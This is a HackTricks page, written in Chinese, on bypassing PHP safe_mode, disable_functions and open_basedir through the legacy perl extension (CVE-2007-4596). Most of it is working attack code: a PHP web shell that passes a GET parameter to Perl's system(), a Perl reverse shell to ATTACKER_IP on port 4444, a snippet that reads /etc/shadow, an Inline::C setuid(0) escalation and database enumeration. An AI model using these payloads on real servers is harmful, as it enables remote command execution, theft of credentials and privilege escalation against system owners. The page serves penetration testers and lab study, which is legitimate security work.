HackTricksPHP Perl 扩展 Safe_mode Bypass Exploit
Tip
学习和实践 AWS 黑客技术:
HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
背景
标记为 CVE-2007-4596 的问题来自遗留的 perl PHP 扩展,该扩展内嵌了完整的 Perl 解释器,但不遵守 PHP 的 safe_mode、disable_functions 或 open_basedir 控制。任何加载了 extension=perl.so 的 PHP worker 都能获得不受限制的 Perl eval,因此即便所有常见的 PHP 进程生成原语被阻断,命令执行仍然非常容易。尽管 safe_mode 在 PHP 5.4 中被移除,许多过时的共享主机堆栈和易受攻击的实验环境仍然包含它,因此在遇到遗留控制面板时该绕过仍然有价值。
在 2025 年构建可测试环境
- 最后公开发布的构建是 (
perl-1.0.1, January 2013),目标为 PHP ≥5.0。从 PECL 获取,针对你计划攻击的精确 PHP 分支编译,并在全局(php.ini)或通过dl()(若允许)加载它。 - 快速的基于 Debian 的实验室安装步骤:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
- 利用时通过
var_dump(extension_loaded('perl'));或print_r(get_loaded_extensions());确认可用性。如果不存在,搜索perl.so或滥用可写的php.ini/.user.ini条目以强制加载它。 - 由于解释器驻留在 PHP worker 内部,因此不需要外部二进制——网络出口过滤或
proc_open黑名单不影响本绕过。
Original PoC (NetJackal)
From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, still handy to confirm the extension responds to eval:
<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "</textarea>";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>
现代 Payload 增强
1. 通过 TCP 获取完整 TTY
即使 /usr/bin/perl 被阻止,嵌入式解释器也可以加载 IO::Socket:
$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN, '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);
2. File-System Escape Even with open_basedir
Perl 会忽略 PHP 的 open_basedir,因此你可以读取任意文件:
$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');
通过将输出导向 IO::Socket::INET 或 Net::HTTP 来 exfiltrate 数据,而不触及由 PHP 管理的描述符。
3. Inline Compilation for Privilege Escalation
如果 Inline::C 在系统范围内存在,可在请求内部编译辅助代码,而无需依赖 PHP 的 ffi 或 pcntl:
$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);
4. Living-off-the-Land Enumeration
把 Perl 当作一个 LOLBAS 工具包来使用——例如,即使缺少 mysqli,也可以转储 MySQL DSNs:
$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');
参考资料
Tip
学习和实践 AWS 黑客技术:
学习和实践 GCP 黑客技术:支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。